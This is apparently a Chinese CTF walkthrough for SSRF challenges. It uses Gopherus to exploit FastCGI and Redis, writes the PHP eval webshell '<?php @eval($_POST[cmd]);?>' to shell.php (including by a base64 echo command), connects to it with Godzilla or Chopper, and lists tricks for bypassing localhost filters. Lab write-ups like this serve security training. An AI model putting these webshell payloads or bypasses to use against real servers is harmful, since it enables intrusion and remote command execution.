目录
FastCGI协议
开启题目
访问网址,页面上什么都没有
尝试试试FastCGI协议
在kali中使用以下语句克隆Gopherus
git clone https://github.com/tarunkant/Gopherus.git
克隆成功后,在Gopherus目录下输入以下执行口令
python2 gopherus.py --exploit fastcgi
成功后,如下图所示,需要输入目标网址真实存在的一个.php文件的绝对路径
尝试在该网址中访问index.php,发现没有报错404,说明该.php文件真实存在
之后在gopherus的语句需要输入一句话木马
<?php @eval($_POST[cmd]);?>
直接输入一句话木马,会报错不能输入特殊字符,所以需要将木马编码为base64
在gopherus中输入以下语句
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php
得到以下链接
将内容进行URL编码
在url后输入,编码后的内容
如下图所示,写入成功
查询写入的文件是否成功写入,没有报404错误,写入成功
使用哥斯拉或者菜刀,进行远程连接访问
访问成功
寻找,flag文件
完成
Redis协议
与上一题思路类似,区别是上一题采用fastcgi协议,本题采用redis协议
在gopherus目录下启动终端,输入以下语句
python2 gopherus.py --exploit redis
模式选择
phpshell
输入目标网址的绝对路径
/var/www/html
输入一句话木马
<?php @eval($_POST[cmd]);?>
得到以下链接
将链接进行URL编码
访问编码后的链接,并访问写入的shell.php
使用菜刀远程连接
连接成功后寻找flag
完成
URL Bypass
题目提示必须包含http://notfound.ctfhub.con,若是直接使用就不能访问网站的127.0.0.1,所以采用给出网址@127.0.0.1的方式来访问
效果如下
完成
数字IP Bypass
开启题目发现ban掉了127以及172.,所以直接上localhost
完成
302跳转 Bypass
发现请求可能会跟随302跳转,直接localhost
完成
DNS重绑定 Bypass
开启题目,提示需要DNS重新绑定
在解析网站上获取解析到内网IP的域名
复制内容并访问
完成